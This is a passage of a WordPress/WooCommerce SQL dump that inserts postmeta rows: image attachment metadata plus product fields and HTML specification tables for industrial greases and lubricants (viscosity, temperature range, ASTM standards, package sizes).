}'); 
INSERT INTO `wp_postmeta` VALUES (12550, 1091, '_wp_attached_file', '2016/08/krytox-gpl-series.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12551, 1091, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5616;s:6:"height";i:3744;s:4:"file";s:29:"2016/08/krytox-gpl-series.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:29:"krytox-gpl-series-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:29:"krytox-gpl-series-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"krytox-gpl-series-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:31:"krytox-gpl-series-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:29:"krytox-gpl-series-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:29:"krytox-gpl-series-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:29:"krytox-gpl-series-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:29:"krytox-gpl-series-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12552, 1090, '_edit_lock', '1472584236:3'); 
INSERT INTO `wp_postmeta` VALUES (12553, 1090, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (12554, 1095, '_wp_attached_file', '2016/08/ABOUT-Miller-stephenson-.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12555, 1095, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6016;s:6:"height";i:3916;s:4:"file";s:36:"2016/08/ABOUT-Miller-stephenson-.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:36:"ABOUT-Miller-stephenson--340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:36:"ABOUT-Miller-stephenson--800x521.jpg";s:5:"width";i:800;s:6:"height";i:521;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:36:"ABOUT-Miller-stephenson--768x500.jpg";s:5:"width";i:768;s:6:"height";i:500;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:38:"ABOUT-Miller-stephenson--1600x1041.jpg";s:5:"width";i:1600;s:6:"height";i:1041;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:36:"ABOUT-Miller-stephenson--250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:36:"ABOUT-Miller-stephenson--200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:36:"ABOUT-Miller-stephenson--225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:36:"ABOUT-Miller-stephenson--510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12556, 1077, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (12557, 1031, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (12558, 1033, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (12559, 1035, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (12560, 1097, '_edit_lock', '1482333147:2'); 
INSERT INTO `wp_postmeta` VALUES (12561, 1097, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (12562, 1098, '_wp_attached_file', '2016/08/shutterstock_166416101.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12563, 1098, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3721;s:6:"height";i:2476;s:4:"file";s:34:"2016/08/shutterstock_166416101.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_166416101-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_166416101-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_166416101-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_166416101-1600x1065.jpg";s:5:"width";i:1600;s:6:"height";i:1065;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_166416101-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_166416101-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_166416101-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_166416101-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12564, 1097, '_thumbnail_id', '1098'); 
INSERT INTO `wp_postmeta` VALUES (12565, 1097, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (12566, 1097, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (12567, 1097, '312_default_editor', '<table width="426">\r\n<tbody>\r\n<tr>\r\n<td width="202">Typical Properties</td>\r\n<td style="text-align: center;" width="224">THE</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range</td>\r\n<td style="text-align: center;">-10°F to 350°F</td>\r\n</tr>\r\n<tr>\r\n<td>Thickener</td>\r\n<td style="text-align: center;">Lithium Complex</td>\r\n</tr>\r\n<tr>\r\n<td>Texture</td>\r\n<td style="text-align: center;">Tacky</td>\r\n</tr>\r\n<tr>\r\n<td>Color</td>\r\n<td style="text-align: center;">Grey</td>\r\n</tr>\r\n<tr>\r\n<td>Odor</td>\r\n<td style="text-align: center;">Mild Petroleum</td>\r\n</tr>\r\n<tr>\r\n<td>Solubility in Water</td>\r\n<td style="text-align: center;">Insoluble</td>\r\n</tr>\r\n<tr>\r\n<td>Dropping Point</td>\r\n<td style="text-align: center;">500°F</td>\r\n</tr>\r\n<tr>\r\n<td>Weld Point, Kg</td>\r\n<td style="text-align: center;">400</td>\r\n</tr>\r\n<tr>\r\n<td>Base Fluid Type</td>\r\n<td style="text-align: center;">Petroleum Mineral Oil</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity SUS @ 100°F</td>\r\n<td style="text-align: center;">1715-1875</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity SUS @ 210°F</td>\r\n<td style="text-align: center;">110-122</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity cSt @ 40°F</td>\r\n<td style="text-align: center;">327-350</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity cSt @ 100°F</td>\r\n<td style="text-align: center;">22-24.5</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity Index, Min</td>\r\n<td style="text-align: center;">80</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (12568, 1097, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Gears</li>\r\n 	<li>Joints</li>\r\n 	<li>Chasis</li>\r\n 	<li>More</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (12569, 1097, '719_default_editor', '<ul>\r\n 	<li>ASTM D2265</li>\r\n 	<li>ASTM D217</li>\r\n 	<li>ASTM D1743</li>\r\n 	<li>ASTM D2509</li>\r\n 	<li>ASTM D1264</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (12570, 1097, '317_default_editor', '<table width="667">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="202">Cartridge</td>\r\n<td style="text-align: center;" width="224">Tub</td>\r\n<td style="text-align: center;" width="241">Pail</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">1-</td>\r\n<td style="text-align: center;">16 oz.</td>\r\n<td style="text-align: center;">35 lb</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (12571, 1097, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (12572, 1097, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (12573, 1097, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12574, 1097, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12575, 1097, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (12576, 1097, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12577, 1097, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (12578, 1097, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (12579, 1097, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (12580, 1097, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (12581, 1097, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (12582, 1097, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12583, 1097, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12584, 1097, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12585, 1097, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (12586, 1097, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (12587, 1097, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12588, 1097, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (12589, 1097, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12590, 1097, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12591, 1097, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (12592, 1097, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12593, 1097, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12594, 1097, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (12595, 1097, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12596, 1097, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12597, 1097, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (12598, 1097, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (12599, 1097, '_product_image_gallery', '1805,1806'); 
INSERT INTO `wp_postmeta` VALUES (12600, 1099, '_wp_attached_file', '2016/08/shutterstock_106756229.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12601, 1099, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4752;s:6:"height";i:3148;s:4:"file";s:34:"2016/08/shutterstock_106756229.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_106756229-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_106756229-800x530.jpg";s:5:"width";i:800;s:6:"height";i:530;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_106756229-768x509.jpg";s:5:"width";i:768;s:6:"height";i:509;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_106756229-1600x1060.jpg";s:5:"width";i:1600;s:6:"height";i:1060;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_106756229-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_106756229-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_106756229-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_106756229-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12602, 1097, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (12603, 1100, '_edit_lock', '1482345166:2'); 
INSERT INTO `wp_postmeta` VALUES (12604, 1100, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (12605, 1101, '_wp_attached_file', '2016/08/tribosys_grease_food_grade.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12606, 1101, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5616;s:6:"height";i:3744;s:4:"file";s:38:"2016/08/tribosys_grease_food_grade.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:38:"tribosys_grease_food_grade-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:38:"tribosys_grease_food_grade-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:38:"tribosys_grease_food_grade-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:40:"tribosys_grease_food_grade-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:38:"tribosys_grease_food_grade-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:38:"tribosys_grease_food_grade-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:38:"tribosys_grease_food_grade-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:38:"tribosys_grease_food_grade-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12607, 1100, '_thumbnail_id', '1101'); 
INSERT INTO `wp_postmeta` VALUES (12608, 1100, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (12609, 1100, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (12610, 1100, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12611, 1100, '716_default_editor', '<ul>\r\n 	<li>Hinges</li>\r\n 	<li>Latches</li>\r\n 	<li>Chains</li>\r\n 	<li>Rollers</li>\r\n 	<li>Casters</li>\r\n 	<li>Wheels</li>\r\n 	<li>Slides</li>\r\n 	<li>Doors</li>\r\n 	<li>Locks</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (12612, 1100, '719_default_editor', '<ul>\r\n 	<li>NSF Registered</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (12613, 1100, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12614, 1100, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (12615, 1100, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (12616, 1100, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12617, 1100, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12618, 1100, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (12619, 1100, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12620, 1100, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (12621, 1100, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (12622, 1100, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (12623, 1100, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (12624, 1100, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (12625, 1100, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12626, 1100, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12627, 1100, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12628, 1100, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (12629, 1100, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (12630, 1100, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12631, 1100, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (12632, 1100, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12633, 1100, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12634, 1100, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (12635, 1100, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12636, 1100, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12637, 1100, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (12638, 1100, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12639, 1100, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12640, 1100, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (12641, 1100, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (12642, 1100, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (12643, 1100, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (12644, 1102, '_edit_lock', '1482333707:2'); 
INSERT INTO `wp_postmeta` VALUES (12645, 1103, '_wp_attached_file', '2016/08/shutterstock_215450284.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12646, 1103, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5000;s:6:"height";i:3337;s:4:"file";s:34:"2016/08/shutterstock_215450284.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_215450284-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_215450284-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_215450284-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_215450284-1600x1068.jpg";s:5:"width";i:1600;s:6:"height";i:1068;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_215450284-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_215450284-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_215450284-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_215450284-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12647, 1102, '_thumbnail_id', '1103'); 
INSERT INTO `wp_postmeta` VALUES (12648, 1102, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (12649, 1102, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (12650, 1102, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (12651, 1102, '312_default_editor', '<table width="426">\r\n<tbody>\r\n<tr>\r\n<td width="202">Typical Properties</td>\r\n<td style="text-align: center;" width="224">THT</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range</td>\r\n<td style="text-align: center;">-40°F to 350°F</td>\r\n</tr>\r\n<tr>\r\n<td>Thickener</td>\r\n<td style="text-align: center;">Lithium Complex</td>\r\n</tr>\r\n<tr>\r\n<td>NLGI Grade</td>\r\n<td style="text-align: center;">2</td>\r\n</tr>\r\n<tr>\r\n<td>Texture</td>\r\n<td style="text-align: center;">Smooth/Buttery</td>\r\n</tr>\r\n<tr>\r\n<td>Color</td>\r\n<td style="text-align: center;">Red</td>\r\n</tr>\r\n<tr>\r\n<td>Odor</td>\r\n<td style="text-align: center;">Mild Petroleum</td>\r\n</tr>\r\n<tr>\r\n<td>Solubility in Water</td>\r\n<td style="text-align: center;">Insoluble</td>\r\n</tr>\r\n<tr>\r\n<td>Dropping Point</td>\r\n<td style="text-align: center;">500°F</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity SUS @ 100°F</td>\r\n<td style="text-align: center;">735-950</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity SUS @ 210°F</td>\r\n<td style="text-align: center;">73.5-86</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity cSt @ 40°F</td>\r\n<td style="text-align: center;">140-180</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity cSt @ 100°F</td>\r\n<td style="text-align: center;">13.5-16.5</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity Index, Min</td>\r\n<td style="text-align: center;">90</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (12652, 1102, '716_default_editor', '<ul>\r\n 	<li>Disc Brake Wheel Bearings</li>\r\n 	<li>Fifth Wheels</li>\r\n 	<li>Chassis Components</li>\r\n 	<li>U-joints</li>\r\n 	<li>King Pins</li>\r\n 	<li>Clutch Bearings</li>\r\n 	<li>Ball &amp; Roller Bearings</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (12653, 1102, '719_default_editor', '<ul>\r\n 	<li>ASTM D4950</li>\r\n 	<li>ASTM D2509</li>\r\n 	<li>ASTM D2596</li>\r\n 	<li>ASTM D2266</li>\r\n 	<li>ASTM D942</li>\r\n 	<li>ASTM D217</li>\r\n 	<li>ASTM D2265</li>\r\n 	<li>ASTM D1264</li>\r\n 	<li>ASTM D1742</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (12654, 1102, '317_default_editor', '<table width="667">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="202">Cartridge</td>\r\n<td style="text-align: center;" width="224">Tub</td>\r\n<td style="text-align: center;" width="241">Pail</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">1-</td>\r\n<td style="text-align: center;">16 oz.</td>\r\n<td style="text-align: center;">35 lb</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (12655, 1102, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (12656, 1102, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (12657, 1102, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12658, 1102, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12659, 1102, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (12660, 1102, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12661, 1102, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (12662, 1102, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (12663, 1102, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (12664, 1102, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (12665, 1102, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (12666, 1102, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12667, 1102, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12668, 1102, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12669, 1102, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (12670, 1102, '_sale_price_dates_to', ''); 
